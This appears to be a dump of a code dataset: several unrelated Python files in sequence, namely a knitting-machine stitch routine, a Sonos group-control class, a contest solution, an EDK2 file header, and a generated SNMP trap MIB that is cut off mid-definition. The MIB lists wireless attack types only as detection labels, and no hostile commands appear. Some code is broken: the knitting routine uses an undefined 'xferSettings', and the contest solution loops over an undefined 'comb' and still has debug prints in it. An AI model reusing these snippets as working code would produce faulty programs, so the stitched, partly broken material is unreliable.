content
stringlengths
7
1.05M
def garterKnit(k,beg,end,length,c,side='l', knitsettings=[4,400,400], xfersettings=[2,0,300]): if side == 'l': start=1 else: start=2 length=length+1 for b in range(start,length+1): if b%2==1: k.stitchNumber(xfersettings[0]) k.rollerAdvance(xfersettings[1]) k.speedNumber(xfersettings[2]) for w in range(beg,end): k.xfer(('b',w),('f',w)) k.stitchNumber(knitsettings[0]) k.rollerAdvance(knitsettings[1]) k.speedNumber(knitsettings[2]) for w in range(beg,end): k.knit('+',('f',w),c) else: k.stitchNumber(xferSettings[0]) k.rollerAdvance(xferSettings[1]) k.speedNumber(xferSettings[2]) for w in range(end-1,beg-1,-1): k.xfer(('f',w),('b',w)) k.stitchNumber(knitsettings[0]) k.rollerAdvance(knitsettings[1]) k.speedNumber(knitsettings[2]) for w in range(end-1,beg-1,-1): k.knit('-',('b',w),c)
# Disable while we have Python 2.x compatability # pylint: disable=useless-object-inheritance """This module contains classes and functionality relating to Sonos Groups.""" class ZoneGroup: """ A class representing a Sonos Group. It looks like this:: ZoneGroup( uid='RINCON_000FD584236D01400:58', coordinator=SoCo("192.168.1.101"), members={SoCo("192.168.1.101"), SoCo("192.168.1.102")} ) Any SoCo instance can tell you what group it is in:: >>> device = soco.discovery.any_soco() >>> device.group ZoneGroup( uid='RINCON_000FD584236D01400:58', coordinator=SoCo("192.168.1.101"), members={SoCo("192.168.1.101"), SoCo("192.168.1.102")} ) From there, you can find the coordinator for the current group:: >>> device.group.coordinator SoCo("192.168.1.101") or, for example, its name:: >>> device.group.coordinator.player_name Kitchen or a set of the members:: >>> device.group.members {SoCo("192.168.1.101"), SoCo("192.168.1.102")} For convenience, ZoneGroup is also a container:: >>> for player in device.group: ... print player.player_name Living Room Kitchen If you need it, you can get an iterator over all groups on the network:: >>> device.all_groups <generator object all_groups at 0x108cf0c30> A consistent readable label for the group members can be returned with the `label` and `short_label` properties. Properties are available to get and set the group `volume` and the group `mute` state, and the `set_relative_volume()` method can be used to make relative adjustments to the group volume, e.g.: >>> device.group.volume = 25 >>> device.group.volume 25 >>> device.group.set_relative_volume(-10) 15 >>> device.group.mute >>> False >>> device.group.mute = True >>> device.group.mute True """ def __init__(self, uid, coordinator, members=None): """ Args: uid (str): The unique Sonos ID for this group, eg ``RINCON_000FD584236D01400:5``. coordinator (SoCo): The SoCo instance representing the coordinator of this group. members (Iterable[SoCo]): An iterable containing SoCo instances which represent the members of this group. """ #: The unique Sonos ID for this group self.uid = uid #: The `SoCo` instance which coordinates this group self.coordinator = coordinator if members is not None: #: A set of `SoCo` instances which are members of the group self.members = set(members) else: self.members = set() def __iter__(self): return self.members.__iter__() def __contains__(self, member): return member in self.members def __repr__(self): return "{}(uid='{}', coordinator={!r}, members={!r})".format( self.__class__.__name__, self.uid, self.coordinator, self.members ) @property def label(self): """str: A description of the group. >>> device.group.label 'Kitchen, Living Room' """ group_names = sorted([m.player_name for m in self.members]) return ", ".join(group_names) @property def short_label(self): """str: A short description of the group. >>> device.group.short_label 'Kitchen + 1' """ group_names = sorted([m.player_name for m in self.members]) group_label = group_names[0] if len(group_names) > 1: group_label += " + {}".format(len(group_names) - 1) return group_label @property def volume(self): """int: The volume of the group. An integer between 0 and 100. """ response = self.coordinator.groupRenderingControl.GetGroupVolume( [("InstanceID", 0)] ) return int(response["CurrentVolume"]) @volume.setter def volume(self, group_volume): group_volume = int(group_volume) group_volume = max(0, min(group_volume, 100)) # Coerce in range self.coordinator.groupRenderingControl.SetGroupVolume( [("InstanceID", 0), ("DesiredVolume", group_volume)] ) @property def mute(self): """bool: The mute state for the group. True or False. """ response = self.coordinator.groupRenderingControl.GetGroupMute( [("InstanceID", 0)] ) mute_state = response["CurrentMute"] return bool(int(mute_state)) @mute.setter def mute(self, group_mute): mute_value = "1" if group_mute else "0" self.coordinator.groupRenderingControl.SetGroupMute( [("InstanceID", 0), ("DesiredMute", mute_value)] ) def set_relative_volume(self, relative_group_volume): """Adjust the group volume up or down by a relative amount. If the adjustment causes the volume to overshoot the maximum value of 100, the volume will be set to 100. If the adjustment causes the volume to undershoot the minimum value of 0, the volume will be set to 0. Note that this method is an alternative to using addition and subtraction assignment operators (+=, -=) on the `volume` property of a `ZoneGroup` instance. These operators perform the same function as `set_relative_volume()` but require two network calls per operation instead of one. Args: relative_group_volume (int): The relative volume adjustment. Can be positive or negative. Returns: int: The new group volume setting. Raises: ValueError: If ``relative_group_volume`` cannot be cast as an integer. """ relative_group_volume = int(relative_group_volume) # Sonos automatically handles out-of-range values. resp = self.coordinator.groupRenderingControl.SetRelativeGroupVolume( [("InstanceID", 0), ("Adjustment", relative_group_volume)] ) return int(resp["NewVolume"])
def resolve(): ''' code here ''' N, M, Q = [int(item) for item in input().split()] a_list = [[int(item) for item in input().split()] for _ in range(Q)] res = 0 for item in comb: temp_res = 0 print(item) for j in a_list: a = j[0]-1 b = j[1]-1 c = j[2] d = j[3] if item[b] -item[a] == c: temp_res += d print(item[b] , item[a]) print(b,a) print(c,d, '---') res = max(res, temp_res) print(res) if __name__ == "__main__": resolve()
## @file GenXmlFile.py # # This file contained the logical of generate XML files. # # Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR> # # SPDX-License-Identifier: BSD-2-Clause-Patent # ''' GenXmlFile '''
# # PySNMP MIB module RBTWS-TRAP-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/RBTWS-TRAP-MIB # Produced by pysmi-0.3.4 at Wed May 1 14:53:51 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ValueRangeConstraint") RbtwsApFingerprint, RbtwsRadioConfigState, RbtwsApConnectSecurityType, RbtwsChannelChangeType, RbtwsApNum, RbtwsApServiceAvailability, RbtwsRadioType, RbtwsApSerialNum, RbtwsApAttachType, RbtwsApFailDetail, RbtwsRadioMimoState, RbtwsRadioChannelWidth, RbtwsRadioMode, RbtwsRadioNum, RbtwsPowerLevel, RbtwsCryptoType, RbtwsApWasOperational, RbtwsRadioPowerChangeType, RbtwsAccessType, RbtwsApTransition, RbtwsApPortOrDapNum = mibBuilder.importSymbols("RBTWS-AP-TC", "RbtwsApFingerprint", "RbtwsRadioConfigState", "RbtwsApConnectSecurityType", "RbtwsChannelChangeType", "RbtwsApNum", "RbtwsApServiceAvailability", "RbtwsRadioType", "RbtwsApSerialNum", "RbtwsApAttachType", "RbtwsApFailDetail", "RbtwsRadioMimoState", "RbtwsRadioChannelWidth", "RbtwsRadioMode", "RbtwsRadioNum", "RbtwsPowerLevel", "RbtwsCryptoType", "RbtwsApWasOperational", "RbtwsRadioPowerChangeType", "RbtwsAccessType", "RbtwsApTransition", "RbtwsApPortOrDapNum") RbtwsClientAuthenProtocolType, RbtwsClientSessionState, RbtwsClientDot1xState, RbtwsClientAccessMode, RbtwsUserAccessType = mibBuilder.importSymbols("RBTWS-CLIENT-SESSION-TC", "RbtwsClientAuthenProtocolType", "RbtwsClientSessionState", "RbtwsClientDot1xState", "RbtwsClientAccessMode", "RbtwsUserAccessType") RbtwsRFDetectClassificationReason, = mibBuilder.importSymbols("RBTWS-RF-DETECT-TC", "RbtwsRFDetectClassificationReason") rbtwsTraps, rbtwsMibs, rbtwsTemporary = mibBuilder.importSymbols("RBTWS-ROOT-MIB", "rbtwsTraps", "rbtwsMibs", "rbtwsTemporary") NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance") Integer32, Unsigned32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, iso, NotificationType, Counter32, ObjectIdentity, IpAddress, MibIdentifier, ModuleIdentity, Gauge32, Counter64 = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "Unsigned32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "iso", "NotificationType", "Counter32", "ObjectIdentity", "IpAddress", "MibIdentifier", "ModuleIdentity", "Gauge32", "Counter64") TextualConvention, DisplayString, MacAddress = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString", "MacAddress") rbtwsTrapMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 4, 1)) rbtwsTrapMib.setRevisions(('2008-05-15 02:15', '2008-05-07 02:12', '2008-04-22 02:02', '2008-04-10 02:01', '2008-04-08 01:58', '2008-02-18 01:57', '2007-12-03 01:53', '2007-11-15 01:52', '2007-11-01 01:45', '2007-10-01 01:41', '2007-08-31 01:40', '2007-08-24 01:22', '2007-07-06 01:10', '2007-06-05 01:07', '2007-05-17 01:06', '2007-05-04 01:03', '2007-04-19 01:00', '2007-03-27 00:54', '2007-02-15 00:53', '2007-01-09 00:52', '2007-01-09 00:51', '2007-01-09 00:50', '2006-09-28 00:45', '2006-08-08 00:42', '2006-07-31 00:40', '2006-07-28 00:32', '2006-07-23 00:29', '2006-07-12 00:28', '2006-07-07 00:26', '2006-07-07 00:25', '2006-07-06 00:23', '2006-04-19 00:22', '2006-04-19 00:21', '2005-01-01 00:00',)) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): if mibBuilder.loadTexts: rbtwsTrapMib.setRevisionsDescriptions(('v3.8.5: Clarified description to reflect the actual use and avoid future misuse of rbtwsDeviceSerNum. Updated description for rbtwsApName. Documented the meaning of RbtwsClientIpAddrChangeReason enumeration values. This will be published in 7.0 release.', 'v3.8.2: Added new trap: rbtwsClusterFailureTrap, related TC and objects: RbtwsClusterFailureReason, rbtwsClusterFailureReason, rbtwsClusterFailureDescription (for 7.0 release)', 'v3.7.2: Added new traps: rbtwsRFDetectRogueDeviceTrap2, rbtwsRFDetectSuspectDeviceTrap2 and related objects: rbtwsRFDetectXmtrRadioType, rbtwsRFDetectXmtrCryptoType. Obsoleted rbtwsRFDetectRogueDeviceTrap, rbtwsRFDetectSuspectDeviceTrap. (for 7.0 release)', 'v3.7.1: Added new trap: rbtwsClientAuthorizationSuccessTrap4, and related object: rbtwsClientRadioType. Obsoletes rbtwsClientAuthorizationSuccessTrap, rbtwsClientAuthorizationSuccessTrap2, rbtwsClientAuthorizationSuccessTrap3. (for 7.0 release)', 'v3.6.8: Obsoleted two traps: rbtwsRFDetectSpoofedMacAPTrap, rbtwsRFDetectSpoofedSsidAPTrap. (for 7.0 release)', 'v3.6.7: Redesigned the AP Operational - Radio Status trap to support 11n-capable APs. Added varbindings: rbtwsRadioChannelWidth, rbtwsRadioMimoState. The new trap is rbtwsApOperRadioStatusTrap3. (for 7.0 release)', 'v3.6.3: Obsoleted one object: rbtwsApPortOrDapNum (previously deprecated). This will be published in 7.0 release.', 'v3.6.2: Added three new traps: rbtwsApManagerChangeTrap, rbtwsClientClearedTrap2, rbtwsMobilityDomainResiliencyStatusTrap, related TCs and objects: RbtwsApMgrChangeReason, rbtwsApMgrChangeReason, rbtwsApMgrOldIp, rbtwsApMgrNewIp, rbtwsClientSessionElapsedSeconds, RbtwsClientClearedReason, rbtwsClientClearedReason, RbtwsMobilityDomainResiliencyStatus, rbtwsMobilityDomainResiliencyStatus. Obsoleted one trap: rbtwsClientClearedTrap, and related object: rbtwsClientSessionElapsedTime. (for 7.0 release)', 'v3.5.5: Added new trap: rbtwsClientAuthorizationSuccessTrap3, related TC and objects: RbtwsClientAuthorizationReason rbtwsClientAuthorizationReason, rbtwsClientAccessMode, rbtwsPhysPortNum. Obsoletes rbtwsClientAuthorizationSuccessTrap, rbtwsClientAuthorizationSuccessTrap2. (for 6.2 release)', 'v3.5.1: Cleaned up object (rbtwsAPAccessType). Marked it as obsolete, because instrumentation code for traps using it was removed long time ago. (This will be published in 6.2 release.)', "v3.5.0: Corrected rbtwsClientMACAddress2 SYNTAX: its value was always a MacAddress, not an arbitrary 'OCTET STRING (SIZE (6))'. There is no change on the wire, just a more appropriate DISPLAY-HINT.", 'v3.3.2: Added new trap: rbtwsMichaelMICFailure, related TC and object: RbtwsMichaelMICFailureCause, rbtwsMichaelMICFailureCause. Obsoletes rbtwsMpMichaelMICFailure, rbtwsMpMichaelMICFailure2. (for 6.2 release)', 'v3.2.0: Redesigned the AP Status traps. - Replaced rbtwsApAttachType and rbtwsApPortOrDapNum with a single varbinding, rbtwsApNum. - Added varbinding rbtwsRadioMode to the AP Operational - Radio Status trap. The new traps are rbtwsApNonOperStatusTrap2, rbtwsApOperRadioStatusTrap2. (for 6.2 release)', 'v3.1.2: Obsoleted one trap: rbtwsRFDetectUnAuthorizedAPTrap (for 6.2 release)', 'v3.1.1: Added new trap: rbtwsConfigurationSavedTrap and related objects: rbtwsConfigSaveFileName, rbtwsConfigSaveInitiatorType, rbtwsConfigSaveInitiatorIp, rbtwsConfigSaveInitiatorDetails, rbtwsConfigSaveGeneration. (for 6.2 release)', 'v3.0.1: added one value (3) to RbtwsClientIpAddrChangeReason', 'v3.0.0: Added six new traps: rbtwsRFDetectRogueDeviceTrap, rbtwsRFDetectRogueDeviceDisappearTrap, rbtwsRFDetectSuspectDeviceTrap, rbtwsRFDetectSuspectDeviceDisappearTrap, rbtwsRFDetectClientViaRogueWiredAPTrap3, rbtwsRFDetectClassificationChangeTrap and related object: rbtwsRFDetectClassificationReason. Obsoleted seven traps: rbtwsRFDetectRogueAPTrap, rbtwsRFDetectRogueDisappearTrap, rbtwsRFDetectInterferingRogueAPTrap, rbtwsRFDetectInterferingRogueDisappearTrap, rbtwsRFDetectUnAuthorizedSsidTrap, rbtwsRFDetectUnAuthorizedOuiTrap, rbtwsRFDetectClientViaRogueWiredAPTrap2. (for 6.2 release)', 'v2.9.2: added three values (13, 14, 15) to RbtwsAuthorizationFailureType (for 6.2 release)', 'v2.9.1: Cleaned up trap (rbtwsClientAuthorizationSuccessTrap) and object (rbtwsRadioRssi) deprecated long time ago. Marked them as obsolete, because instrumentation code was removed already. (This will be published in 6.2 release.)', 'v2.9.0: Added two textual conventions: RbtwsUserAttributeList, RbtwsSessionDisconnectType three new traps: rbtwsClientDynAuthorChangeSuccessTrap, rbtwsClientDynAuthorChangeFailureTrap, rbtwsClientDisconnectTrap and related objects: rbtwsClientDynAuthorClientIp, rbtwsChangedUserParamOldValues, rbtwsChangedUserParamNewValues, rbtwsClientDisconnectSource, rbtwsClientDisconnectDescription (for 6.2 release)', 'v2.8.5: added one value (24) to RbtwsRFDetectDoSType (for 6.2 release)', 'v2.6.4: Added two new traps: rbtwsMobilityDomainFailOverTrap, rbtwsMobilityDomainFailBackTrap and related objects: rbtwsMobilityDomainSecondarySeedIp, rbtwsMobilityDomainPrimarySeedIp (for 6.0 release)', 'v2.6.2: Factored out four textual conventions into a new module, Client Session TC: RbtwsClientSessionState, RbtwsClientAuthenProtocolType, RbtwsClientDot1xState, RbtwsUserAccessType and imported them from there.', 'v2.5.2: Added new trap: rbtwsApRejectLicenseExceededTrap and related object: rbtwsNumLicensedActiveAPs (for 6.0 release)', 'v2.5.0: Added new trap: rbtwsRFDetectAdhocUserDisappearTrap (for 6.0 release)', 'v2.4.7: Removed unused imports', 'v2.4.1: Added new trap: rbtwsRFDetectBlacklistedTrap, related textual convention: RbtwsBlacklistingCause and objects: rbtwsBlacklistingRemainingTime, rbtwsBlacklistingCause (for 6.0 release)', 'v2.4.0: Added new trap: RFDetectClientViaRogueWiredAPTrap2 and related object: rbtwsRFDetectRogueAPMacAddr. This trap obsoletes the RFDetectClientViaRogueWiredAPTrap (for 6.0 release)', 'v2.3.1: Added 3 new traps: rbtwsClientAssociationSuccessTrap, rbtwsClientAuthenticationSuccessTrap, rbtwsClientDeAuthenticationTrap (for 6.0 release)', 'v2.3.0: Added new trap: rbtwsClientIpAddrChangeTrap and related object: RbtwsClientIpAddrChangeReason (for 6.0 release)', 'v2.2.0: added two values (13, 14) to RbtwsAuthenticationFailureType (for 6.0 release)', 'v2.1.6: Updated client connection failure causes and descriptions (for 5.0 release)', 'v2.0.6: Revised for 4.1 release', 'v1: initial version, as for 4.0 and older releases',)) if mibBuilder.loadTexts: rbtwsTrapMib.setLastUpdated('200805151711Z') if mibBuilder.loadTexts: rbtwsTrapMib.setOrganization('Enterasys Networks') if mibBuilder.loadTexts: rbtwsTrapMib.setContactInfo('www.enterasys.com') if mibBuilder.loadTexts: rbtwsTrapMib.setDescription("Notifications emitted by Enterasys Networks wireless switches. AP = Access Point; AC = Access Controller (wireless switch), the device that runs a SNMP Agent implementing this MIB. Copyright 2008 Enterasys Networks, Inc. All rights reserved. This SNMP Management Information Base Specification (Specification) embodies confidential and proprietary intellectual property. This Specification is supplied 'AS IS' and Enterasys Networks makes no warranty, either express or implied, as to the use, operation, condition, or performance of the Specification.") rbtwsTrapsV2 = MibIdentifier((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 5, 0)) class RbtwsAssociationFailureType(TextualConvention, Integer32): description = "Enumeration of the reasons for an AP to fail a client's 802.11 association" status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13)) namedValues = NamedValues(("other", 1), ("load-balance", 2), ("quiet-period", 3), ("dot1x", 4), ("no-prev-assoc", 5), ("glare", 6), ("cipher-rejected", 7), ("cipher-mismatch", 8), ("wep-not-configured", 9), ("bad-assoc-request", 10), ("out-of-memory", 11), ("tkip-cm-active", 12), ("roam-in-progress", 13)) class RbtwsAuthenticationFailureType(TextualConvention, Integer32): description = "Enumeration of the reasons for AAA authentication to fail user-glob-mismatch - auth rule/user not found for console login user-does-not-exist - login failed because user not found invalid-password - login failed because of invalid password server-timeout - unable to contact a AAA server signature-failed - incorrect password for mschapv2 local-certificate-error - certificate error all-servers-down - unable to contact any AAA server in the group authentication-type-mismatch - client and switch are using different authentication methods server-rejected - received reject from AAA server fallthru-auth-misconfig - problem with fallthru authentication no-lastresort-auth - problem with last-resort authentication exceeded-max-attempts - local user failed to login within allowed number of attempts resulting in account lockout password-expired - user's password expired" status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14)) namedValues = NamedValues(("other", 1), ("user-glob-mismatch", 2), ("user-does-not-exist", 3), ("invalid-password", 4), ("server-timeout", 5), ("signature-failed", 6), ("local-certificate-error", 7), ("all-servers-down", 8), ("authentication-type-mismatch", 9), ("server-rejected", 10), ("fallthru-auth-misconfig", 11), ("no-lastresort-auth", 12), ("exceeded-max-attempts", 13), ("password-expired", 14)) class RbtwsAuthorizationFailureType(TextualConvention, Integer32): description = 'Enumeration of the reasons for AAA authorization failure' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)) namedValues = NamedValues(("other", 1), ("user-param", 2), ("location-policy", 3), ("vlan-tunnel-failure", 4), ("ssid-mismatch", 5), ("acl-mismatch", 6), ("timeofday-mismatch", 7), ("crypto-type-mismatch", 8), ("mobility-profile-mismatch", 9), ("start-date-mismatch", 10), ("end-date-mismatch", 11), ("svr-type-mismatch", 12), ("ssid-defaults", 13), ("qos-profile-mismatch", 14), ("simultaneous-logins", 15)) class RbtwsDot1xFailureType(TextualConvention, Integer32): description = "Enumeration of the dot1x failure reasons. quiet-period occurs when client is denied access for a period of time after a failed connection attempt administrative-kill means that the session was cleared using the 'clear dot1x client' command bad-rsnie means that client sent an invalid IE timeout is when there are excessive retransmissions max-sessions-exceeded means the maximum allowed wired clients has been exceeded on the switch fourway-hs-failure is for failures occuring the 4-way key handshake user-glob-mismatch means the name received in the dot1x identity request does not match any configured userglobs in the system reauth-disabled means that the client is trying to reauthenticate but reauthentication is disabled gkhs-failure means that either there was no response from the client during the GKHS or the response did not have an IE force-unauth-configured means that the client is trying to connect through a port which is configured as force-unauth cert-not-installed means that there is no certificate installed on the switch" status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13)) namedValues = NamedValues(("other", 1), ("quiet-period", 2), ("administrative-kill", 3), ("bad-rsnie", 4), ("timeout", 5), ("max-sessions-exceeded", 6), ("fourway-hs-failure", 7), ("user-glob-mismatch", 8), ("bonded-auth-failure", 9), ("reauth-disabled", 10), ("gkhs-failure", 11), ("force-unauth-configured", 12), ("cert-not-installed", 13)) class RbtwsRFDetectDoSType(TextualConvention, Integer32): description = 'The types of denial of service (DoS) attacks' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24)) namedValues = NamedValues(("probe-flood", 1), ("auth-flood", 2), ("null-data-flood", 3), ("mgmt-6-flood", 4), ("mgmt-7-flood", 5), ("mgmt-d-flood", 6), ("mgmt-e-flood", 7), ("mgmt-f-flood", 8), ("fakeap-ssid", 9), ("fakeap-bssid", 10), ("bcast-deauth", 11), ("null-probe-resp", 12), ("disassoc-spoof", 13), ("deauth-spoof", 14), ("decrypt-err", 15), ("weak-wep-iv", 16), ("wireless-bridge", 17), ("netstumbler", 18), ("wellenreiter", 19), ("adhoc-client-frame", 20), ("associate-pkt-flood", 21), ("re-associate-pkt-flood", 22), ("de-associate-pkt-flood", 23), ("bssid-spoof", 24)) class RbtwsClientIpAddrChangeReason(TextualConvention, Integer32): description = 'Describes the reasons for client IP address changes: client-connected: IP address assigned on initial connection; other: IP address changed after initial connection; dhcp-to-static: erroneous condition where client IP address is changed to a static address while the dhcp-restrict option is enabled.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3)) namedValues = NamedValues(("client-connected", 1), ("other", 2), ("dhcp-to-static", 3)) class RbtwsBlacklistingCause(TextualConvention, Integer32): description = "Enumeration of reasons for blacklisting a transmitter: bl-configured: administrative action (explicitly added to the Black List), bl-associate-pkt-flood: Association request flood detected, bl-re-associate-pkt-flood: Re-association request flood detected, bl-de-associate-pkt-flood: De-association request flood detected. (The leading 'bl-' stands for 'Black-Listed'; reading it as 'Blocked' would also make sense)." status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4)) namedValues = NamedValues(("bl-configured", 1), ("bl-associate-pkt-flood", 2), ("bl-re-associate-pkt-flood", 3), ("bl-de-associate-pkt-flood", 4)) class RbtwsUserAttributeList(DisplayString): description = 'Display string listing AAA attributes and their values. These strings can be used, for example, in change of authorization notifications. The syntax is: attribute_name1=value1, attribute_name2=value2, ... where attribute_name can be one of the following: vlan-name, in-acl, out-acl, mobility-prof, time-of-day, end-date, sess-timeout, acct-interval, service-type. Example: vlan-name=red, in-acl=in_acl_1' status = 'current' subtypeSpec = DisplayString.subtypeSpec + ValueSizeConstraint(0, 2048) class RbtwsSessionDisconnectType(TextualConvention, Integer32): description = 'Enumeration of the sources that can initiate the termination of a session: admin-disconnect: session terminated by administrative action (from console, telnet session, WebView, or RASM). dyn-auth-disconnect: session terminated by dynamic authorization client; description will have the IP address of the dynamic authorization client which sent the request.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3)) namedValues = NamedValues(("other", 1), ("admin-disconnect", 2), ("dyn-auth-disconnect", 3)) class RbtwsConfigSaveInitiatorType(TextualConvention, Integer32): description = 'Enumeration of the sources that can initiate a configuration save: cli-console: configuration save requested from serial console administrative session. cli-remote: configuration save requested from telnet or ssh administrative session. https: configuration save requested via HTTPS API (RASM or WebView). snmp-set: configuration saved as a result of performing a SNMP SET operation.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5)) namedValues = NamedValues(("other", 1), ("cli-console", 2), ("cli-remote", 3), ("https", 4), ("snmp-set", 5)) class RbtwsMichaelMICFailureCause(TextualConvention, Integer32): description = 'Describes the cause/source of Michael MIC Failure detection.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2)) namedValues = NamedValues(("detected-by-ap", 1), ("detected-by-client", 2)) class RbtwsClientAuthorizationReason(TextualConvention, Integer32): description = 'Enumeration of the reasons for AAA authorization.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4)) namedValues = NamedValues(("other", 1), ("new-client", 2), ("re-auth", 3), ("roam", 4)) class RbtwsApMgrChangeReason(TextualConvention, Integer32): description = "Enumeration of the reasons why AP is switching to its secondary link: failover: AP's primary link failed. load-balancing: AP's primary link is overloaded." status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3)) namedValues = NamedValues(("other", 1), ("failover", 2), ("load-balancing", 3)) class RbtwsClientClearedReason(TextualConvention, Integer32): description = 'Enumeration of the reasons for clearing a session: normal: Session was cleared from the switch as the last step in the normal session termination process. backup-failure: The backup switch could not activate a session from a failed MX.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3)) namedValues = NamedValues(("other", 1), ("normal", 2), ("backup-failure", 3)) class RbtwsMobilityDomainResiliencyStatus(TextualConvention, Integer32): description = 'Enumeration of the current resilient capacity status for a mobility domain: resilient: Every AP in the mobility domain has a secondary backup link. If the primary switch of an AP failed, the AP and its sessions would fail over to its backup link. degraded: Some APs only have a primary link. If the primary switch of an AP without a backup link failed, the AP would reboot and its sessions would be lost.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3)) namedValues = NamedValues(("other", 1), ("resilient", 2), ("degraded", 3)) class RbtwsClusterFailureReason(TextualConvention, Integer32): description = 'Enumeration of the reasons why the AC goes into cluster failure state: validation-error: Cluster configuration rejected due to validation error.' status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2)) namedValues = NamedValues(("other", 1), ("validation-error", 2)) rbtwsDeviceId = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 1), ObjectIdentifier()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsDeviceId.setStatus('current') if mibBuilder.loadTexts: rbtwsDeviceId.setDescription('Enumeration of devices as indicated in registration MIB. This object is used within notifications and is not accessible.') rbtwsMobilityDomainIp = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 2), IpAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsMobilityDomainIp.setStatus('current') if mibBuilder.loadTexts: rbtwsMobilityDomainIp.setDescription('IP address of the other switch which the send switch is reporting on. This object is used within notifications and is not accessible.') rbtwsAPMACAddress = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 3), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsAPMACAddress.setStatus('current') if mibBuilder.loadTexts: rbtwsAPMACAddress.setDescription('MAC address of the AP of interest. This object is used within notifications and is not accessible.') rbtwsClientMACAddress = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 4), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsClientMACAddress.setStatus('current') if mibBuilder.loadTexts: rbtwsClientMACAddress.setDescription('MAC address of the client of interest. This object is used within notifications and is not accessible.') rbtwsRFDetectXmtrMacAddr = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 5), MacAddress()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRFDetectXmtrMacAddr.setStatus('current') if mibBuilder.loadTexts: rbtwsRFDetectXmtrMacAddr.setDescription("Describes the transmitter's MAC address. This object is used within notifications and is not accessible.") rbtwsPortNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 22))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsPortNum.setStatus('current') if mibBuilder.loadTexts: rbtwsPortNum.setDescription('Port number on the AC which reported this rogue during a detection sweep. This object is used within notifications and is not accessible.') rbtwsAPRadioNum = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 7), RbtwsRadioNum()).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsAPRadioNum.setStatus('current') if mibBuilder.loadTexts: rbtwsAPRadioNum.setDescription('Radio number of the AP which reported this rogue during a detection sweep. This object is used within notifications and is not accessible.') rbtwsRadioRssi = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1024))).setMaxAccess("accessiblefornotify") if mibBuilder.loadTexts: rbtwsRadioRssi.setStatus('obsolete') if mibBuilder.loadTexts: rbtwsRadioRssi.setDescription('The received signal strength as measured by the AP radio which reported this rogue during a detection sweep. This object is used within notifications and is not accessible. Not used by any notification.') rbtwsRadioBSSID = MibScalar((1, 3, 6, 1, 4, 1, 52, 4, 15, 1, 2, 9), 